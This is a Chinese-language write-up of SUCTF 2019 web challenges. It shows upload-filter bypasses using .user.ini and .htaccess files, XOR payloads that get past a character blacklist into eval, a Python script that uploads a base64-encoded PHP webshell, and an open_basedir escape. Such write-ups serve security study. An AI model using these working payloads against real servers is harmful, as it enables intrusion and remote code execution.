WEB
CheckIn
- 解题过程
题目功能是一个文件上传,可以上传jpg、png等文件,但是限制了php,而且还判断了上传的文件头,使用exif_image来判断的,这个很容易绕过,直接随便加一个图片文件头就行,并且上传之后会给出文件所在目录
,且上传的内容中不能包含<?字符
尝试了.htaccess,发现不行,换思路,使用.user.ini修改配置文件
或者连接shell管理客户端
注意点:
-
.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置 - 前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了
参考资料:.user.ini文件构成的PHP后门
EasyPHP
- 解题过程
首先进行代码审计,如下
<?php
function getTheFlag() {
// webadmin will remove your upload file every 20 min!!!!
$userdir = "upload/tmp_" . md5($_SERVER['REMOTE_ADDR']);
if (!file_exists($userdir)) {
mkdir($userdir);
}
if (!empty($_FILES["file"])) {
$tmp_name = $_FILES["file"]["tmp_name"];
$name = $_FILES["file"]["name"];
$extension = substr($name, strrpos($name, ".") + 1); //substr()返回字符串的子串 strrpos()计算指定字符串在目标字符串中最后一次出现的位置 $extension返回文件的后缀名
if (preg_match("/ph/i", $extension)) {
die("^_^");
}
//文件后缀名中不能出现大小写的ph字符
if (mb_strpos(file_get_contents($tmp_name), '<?') !== False) {
die("^_^");
} //file_get_contents — 将整个文件读入一个字符串 mb_strpos — 查找字符串在另一个字符串中首次出现的位置
//文件内容中不能出现'<?'字符
if (!exif_imagetype($tmp_name)) {
die("^_^");
} //exif_imagetype — 判断一个图像的类型
//要构造图像文件头
$path = $userdir . "/" . $name;
@move_uploaded_file($tmp_name, $path); //搬动临时文件到新目录下
print_r($path);
}
}
$hhh = @$_GET['_'];
if (!$hhh) {
highlight_file(__FILE__);
}
if (strlen($hhh) > 18) {
die('One inch long, one inch strong!');
}
if (preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh)) {
die('Try something else!');
}
$character_type = count_chars($hhh, 3); //count_chars — 返回字符串所用字符的信息 3 - 返回由所有使用了的字节值组成的字符串。
if (strlen($character_type) > 12) {
die("Almost there!");
}
//最多使用12个字符
eval($hhh);
?>
题目分成两个部分,第一部分是执行getTheFlag函数,第二部分是上传shell
先分析第一部分,类似题目参看ISITDTU CTF 2019 EasyPHP 回顾
参考这两篇文章:
PHP不使用数字,字母和下划线写shell
一道题回顾php异或webshell
正则过滤了绝大部分可用字符串,可以使用多个字符异或进行构造,但是直接调用函数长度明显是不够的,这里可以用GET的方式传入我们想要调用的函数,首先FUZZ出_GET,注意这里需要使字符串去重后小于等于12
Python版本
target = "_GET"
payload = ""
for tar in target:
for i in range(255):
temp = 255^i
if chr(temp) == tar:
payload = payload+str(hex(i))
break
head = "%e9"*4
payload = payload.replace("0x","%")
print(head+"^"+payload)
php版本
<?php
$target = "_GET";
$payload = "%ff%ff%ff%ff^";
for ($i = 0; $i < strlen($target); $i++) {
$re = substr($target, $i, 1);
for ($j = 1; $j < 255; $j++) {
$temp = $j ^ 255;
$temp = chr($temp);
if ($temp == $re) {
$payload = $payload . "%" . dechex($j);
break;
}
}
}
echo $payload;
构造出如下payload:${%A0%B8%BA%AB^%ff%ff%ff%ff}{%A0}();&%A0=get_the_flag
接着是第二部分上传文件了进行getshell
#index.html
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<form action="http://a9ae29e2-eb3f-4736-843b-88d878315f7b.node1.buuoj.cn/?_=${%e9%e9%e9%e9^%b6%ae%ac%bd}{%bd}();&%bd=get_the_flag" method="post"
enctype="multipart/form-data"> #enctype 属性规定在发送到服务器之前应该如何对表单数据进行编码
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
上传这里需要绕过图片头和<?的检测
//.htaccess
#define xlogo_width 200
#define xlogo_height 200
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_f528764d624db129b32c21fbca0cb8d6/evil.gif"
//evil.gif
GIF89a12PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7Pz4=
getshell后访问跟目录时才发现是没有权限的,查看phpinfo的信息可以看到开启了open_basedir
同时还禁用了一些函数
使用蚁剑插件绕过disable_functions
参考:绕过disable_functions 插件应用 SUCTF EasyPHP
注意点:连上去之后再传一个PHP小马,再使用插件进行提权
import requests
import base64
url = "http://7adea2c4-8b2f-4da3-a59f-a1db1559a48b.node1.buuoj.cn/?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"
htaccess = b"""\x00\x00\x8a\x39\x8a\x39
AddType application/x-httpd-php .gif
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_fd40c7f4125a9b9ff1a4e75d293e3080/shell.gif"
"""
shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64.b64encode(b"<?php eval($_POST['c']);?>")
#shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ b"<script language='php'>eval($_REQUEST[c]);</script>"
files = [('file',('.htaccess',htaccess,'image/jpeg'))]
data = {"upload":"Submit"}
proxies = {"http":"http://127.0.0.1:8080"}
r = requests.post(url=url, data=data, files=files)#proxies=proxies)
# print r.text
files = [('file',('shell.gif',shell,'image/jpeg'))]
r = requests.post(url=url, data=data, files=files)
print(r.text)
payload:
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');print_r(scandir('/'));
参考资料:
SUCTF2019部分web题解
SUCTF的一些题解
# SUCTF 2019 Writeup
